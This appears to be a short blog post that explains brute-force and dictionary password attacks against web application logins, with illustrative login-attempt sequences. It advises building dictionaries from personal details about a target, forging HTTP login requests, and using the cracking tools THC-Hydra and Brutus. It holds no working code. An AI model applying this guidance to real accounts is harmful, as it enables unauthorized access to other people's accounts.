11/27/15

Brute Force & Dictionary attacks on an Internet Application.

Brute Force Attack on Password.

we have a user name, for example: admin ... then we try each of character combinations as a password using automated script.

for example:

user: admin password: 1 -- login fail
user: admin password: 2 -- login fail

... (many login attempts) ...

user: admin password: Z -- login fail
user: admin password: Z1 -- login fail
user: admin password: Z2 -- login fail

... (many login attempts) ...

user: admin password: T3h_s3cr3t -- login success.


Dictionary Attack on Password.

we have a user name, we have a dictionary of 'words' (character combinations), then we try each of the 'words' alone or concatenated into a longer password. again we use automation tool as script for example.

opinions vary whether a dictionary attack helps to crack passwords truly, but it has uses nevertheless.

often it's better to start with a dictionary, before trying brute force or other methods later.

all information we have about an individual we are trying to compromise is useful here, for forming a proper dictionary.

for a simplified example:

username: admin,
dictionary: 007, bond, eye, gold, golden, pistol, gun, beach, surf, cat, icecream, shake, martini, lemon, stir, _.

after using script we'd have following dictionary attack:

user: admin, password: 007 -- login fail
user: admin, password: bond -- login fail

... (many login attempts) ...

user: admin, password: 007007 -- login fail
user: admin, password: 007bond -- login fail
user: admin, password: 007eye -- login fail

... (many login attempts) ...

user: admin, password: 007_007 -- login fail
user: admin, password: 007_bond -- login success


Attack on an Internet Application.

The difference between logging in on a local system & logging into the Internet Application is that login information is the part of the HTTP(S) request.

We can create a HTTP(S) request manually, inserting the authentication data as proper, then connect to the attacked Internet Application using script.

Providing there's no security mechanisms as 'Captcha' for example, we'll login after a certain amount of time & tries.

HTTP(S) protocol knowledge here comes handy ... at least part(s) of it, but perhaps we can just analyze login-related traffic between our browser & the application using a tool as 'HTTP Trace' plugin for the 'Google Chrome' browser.




HTTPS Traffic.



then we can extract HTTP Request & forge a new, similar one.

there are tools as well, for example:
- THC-Hydra (Linux),
- Brutus (Windows).

... i'd use these preferably.


   


Hydra & Brutus - Online Password Cracking Tools.



No comments:

Post a Comment